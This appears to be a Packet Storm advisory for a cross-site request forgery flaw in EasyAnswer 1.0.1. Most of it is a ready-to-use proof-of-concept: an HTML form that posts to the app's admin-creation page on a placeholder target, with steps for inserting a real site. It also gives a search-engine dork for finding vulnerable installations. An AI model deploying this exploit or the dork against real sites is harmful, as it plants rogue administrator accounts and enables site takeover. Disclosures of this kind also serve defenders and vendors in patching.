EasyAnswer version 1.0.1 suffers from a cross site request forgery vulnerability.
8a8571d6c794a167c8e35842efa44a6c771bc100529859f16183e6a698ebae01====================================================================================================================================
| # Title : EasyAnswer version 1.0.1 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 114.0.1(64-bit) |
| # Vendor : https://www.codester.com/items/40311/ |
| # Dork : "© 2022 Easy Answer All rights reserved." |
====================================================================================================================================
poc :
[+] infected file: admins-create.php
[+] Inside folder /admin/admins-create.php
[+] Dorking İn Google Or Other Search Enggine.
[+] Copy the code below and paste it into an HTML file.
[+] Go to the line 17.
[+] Set the target site link Save changes and apply .
</i>Create Administrator</h2>
</div>
</div>
</div>
</div>
</div>
<div class="row">
<div class="col-md-12 stretch-card">
<div class="card">
<div class="card-body">
<div id="messages">
</div>
<form action="http://CHANGE_TARGET.com/admin/admins-create.php" method="post" id="main_form" name="main_form" enctype="multipart/form-data">
<input type="hidden" id="submitform" name="submitform" value="1">
<div class="form-group row">
<label for="username" class="col-sm-2 col-form-label">Username:</label>
<div class="col-sm-12">
<input type="text" class="form-control" id="username" name="username" value="" placeholder="ADMIN USERNAME">
</div>
</div>
<div class="form-group row">
<label for="password" class="col-sm-2 col-form-label">Password:</label>
<div class="col-sm-12">
<input type="password" class="form-control" id="password" name="password" value="" placeholder="ADMIN PASSWORD">
</div>
</div>
<div class="form-group row">
<label for="email" class="col-sm-2 col-form-label">E-Mail:</label>
<div class="col-sm-12">
<input type="email" class="form-control" id="email" name="email" value="" placeholder="ADMIN E-MAIL ADDRESS">
</div>
</div>
<div class="row-spaces"></div>
<p>
<button type="button" class="btn btn-primary btn-col-light me-2" onclick="document.main_form.submit();" style=""><span>Submit</span></button>
</p>
</form>
</div>
</div>
</div>
</div>
</div>
Greetings to :===================================================================================
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet|
==================================================================================================
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed